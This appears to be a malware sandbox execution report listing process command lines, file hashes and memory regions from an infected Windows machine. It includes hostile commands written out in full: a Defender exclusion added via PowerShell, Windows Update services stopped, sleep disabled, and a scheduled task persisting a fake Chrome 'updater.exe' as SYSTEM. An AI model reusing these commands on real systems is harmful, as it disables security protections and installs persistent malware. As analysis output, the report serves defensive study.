"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,12282619515920077255,18350766789350249296,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,10190492166486849531,17931315916109552050,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,10190492166486849531,17931315916109552050,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,7299178135159070975,8079948826552501164,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3092 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,4825615854534674189,8882673237632103932,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,9635004217065434973,11661739386978840583,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7KP38yy.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6900 -ip 6900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8iC574jv.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8iC574jv.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4372 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9Ei0mD5.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9Ei0mD5.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8024 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8000 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4380 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2232,2297421747794827770,12801585796260566915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4380 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\CF70.exe

C:\Users\Admin\AppData\Local\Temp\CF70.exe

C:\Users\Admin\AppData\Local\Temp\EDC.exe

C:\Users\Admin\AppData\Local\Temp\EDC.exe

C:\Users\Admin\AppData\Local\Temp\1229.exe

C:\Users\Admin\AppData\Local\Temp\1229.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\forc.exe

"C:\Users\Admin\AppData\Local\Temp\forc.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\1229.exe

C:\Users\Admin\AppData\Local\Temp\1229.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8f59946f8,0x7ff8f5994708,0x7ff8f5994718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\B688.exe

C:\Users\Admin\AppData\Local\Temp\B688.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\40B8.exe

C:\Users\Admin\AppData\Local\Temp\40B8.exe

C:\Users\Admin\AppData\Local\Temp\456C.exe

C:\Users\Admin\AppData\Local\Temp\456C.exe

C:\Users\Admin\AppData\Local\Temp\4751.exe

C:\Users\Admin\AppData\Local\Temp\4751.exe

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,5128597822723312026,7772332164866144514,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3672 /prefetch:8

Network


Files


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 24573943c0b2df84cf83a8f1af421a53
SHA1 3705bc34367727745019b10243c141603b55dcba
SHA256 24e6648f9737ece93db642a3c3bc3461f459a42aac105bbc6c74793456e9936b
SHA512 0b3819d9150f0a904db94fe973b401bd2091f9598e10896b9720eefa030f6e82aa963d2fa6de940aa18a92e2a0895746192a340017ad3ff9da375e0cd484a29e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 3a748249c8b0e04e77ad0d6723e564ff
SHA1 5c4cc0e5453c13ffc91f259ccb36acfb3d3fa729
SHA256 f98f5543c33c0b85b191bb85718ee7845982275130da1f09e904d220f1c6ceed
SHA512 53254db3efd9c075e4f24a915e0963563ce4df26d4771925199a605cd111ae5025a65f778b4d4ed8a9b3e83b558066cd314f37b84115d4d24c58207760174af2

memory/7784-431-0x00000000742A0000-0x0000000074A50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 31726669257d79247779110d49616b7d
SHA1 641d7b50b9ac6436f9ee8d1b3256f268775a5a55
SHA256 dca736e669ebf62da9f5a67888f550bde783adadaf5165eaa2c21e169cf4793c
SHA512 00e22e7df469b3c48709cd6963dc8e32c73554aa13e194e13b985bde0cf8f69819dce8cdc700a9f3bc3dfdb5b75f867c6cb53ce7c5df7fafe2105af32b41f616

memory/7784-441-0x0000000007FD0000-0x0000000008574000-memory.dmp

memory/5248-442-0x0000000000400000-0x0000000000488000-memory.dmp

memory/7784-443-0x0000000007AC0000-0x0000000007B52000-memory.dmp

memory/5248-445-0x0000000000400000-0x0000000000488000-memory.dmp

memory/7784-444-0x0000000005680000-0x0000000005690000-memory.dmp

memory/5248-446-0x0000000000400000-0x0000000000488000-memory.dmp

memory/5248-450-0x0000000000400000-0x0000000000488000-memory.dmp

memory/7784-451-0x0000000007B70000-0x0000000007B7A000-memory.dmp

memory/7784-467-0x0000000008BA0000-0x00000000091B8000-memory.dmp

memory/7784-474-0x0000000007E10000-0x0000000007F1A000-memory.dmp

memory/7784-475-0x0000000007D40000-0x0000000007D52000-memory.dmp

memory/7784-476-0x0000000007DA0000-0x0000000007DDC000-memory.dmp

memory/7784-477-0x0000000007F20000-0x0000000007F6C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3b142911ae2162ba380a4e80c2e85b47
SHA1 abcfb87c6369a38d2f5cde925bde342ce1501924
SHA256 29e23f53d084bd4c3ba8f07f6da44e17f202ecccda916f00cee1e5536f2c3b6c
SHA512 009d165f745678e80141df48434afa1090e2036bbadbc941d88abe4f8600663b4a28aad90a5ef92875aa032240d7e4397a9b5c82a84ecc4bd5119078b11dd128

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58be3a.TMP

MD5 7679e5c14172333822ebd79bba67b07e
SHA1 c679dfb7b9661fc16843dd1c7d0a5c00c6d8166d
SHA256 93c7436ce13562b6ba9c94f37811c1596101833a45f9660e0095ba8168ad242f
SHA512 b0ad077d15e32da99858e87e92c3d2cc1cab4a14cba8bdc72c84f5f530bb4bd9f7d4f807e387cefd82860c3f3618a5c1fc1cf926dfe6543b9ff268c425fbb39d

memory/7780-602-0x0000000000470000-0x00000000004CA000-memory.dmp

memory/7780-603-0x0000000000400000-0x000000000046F000-memory.dmp

memory/7780-607-0x00000000742A0000-0x0000000074A50000-memory.dmp

memory/7780-608-0x00000000076E0000-0x00000000076F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021

MD5 fdbf5bcfbb02e2894a519454c232d32f
SHA1 5e225710e9560458ac032ab80e24d0f3cb81b87a
SHA256 d9315d0678ac213bbe2c1de27528f82fd40dbff160f5a0c19850f891da29ea1c
SHA512 9eb86ebb1b50074df9bd94f7660df6f362b5a46411b35ce820740f629f8ef77f0b49a95c5550441a7db2b2638f0ed3d0204cb8f8c76391c05401506833b8c916

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 907014246411782f3e31283b1909e181
SHA1 df3fbd07d9c5cb2a3e17178b1532ab7c8fc2d627
SHA256 accaf7ac1aa71774f4b9e3352005e976ba873a648b1ec24a8c4b145f646163f3
SHA512 8097f13183a002ca21e3c9b1687f841b6839a04e46ca0aa4af216f3f8fc249dca1f5406b375eaecf6bdf8e8087aaacd7066c2c2f6fe6ae9b1da9278f6ec298d5

memory/7784-650-0x00000000742A0000-0x0000000074A50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 bd093ba8883cf9b411b84f480242a6cd
SHA1 373a3552a8848f3730e90f09fa06abe7170edf86
SHA256 7a9f3f44d0f5b802b8589103eccab5407a4ee479ac50f52295f47049cdebc29d
SHA512 0c5d0fbd9b118de2290da481dc49ecbb06495a6b80ef78eb9d5294f4b659493b2560d7594e32d50e0ff655b7ead1c1d21899c18d6ce67ff0d3de3093424d57c1

memory/7780-663-0x0000000008100000-0x0000000008166000-memory.dmp

memory/7784-677-0x0000000005680000-0x0000000005690000-memory.dmp

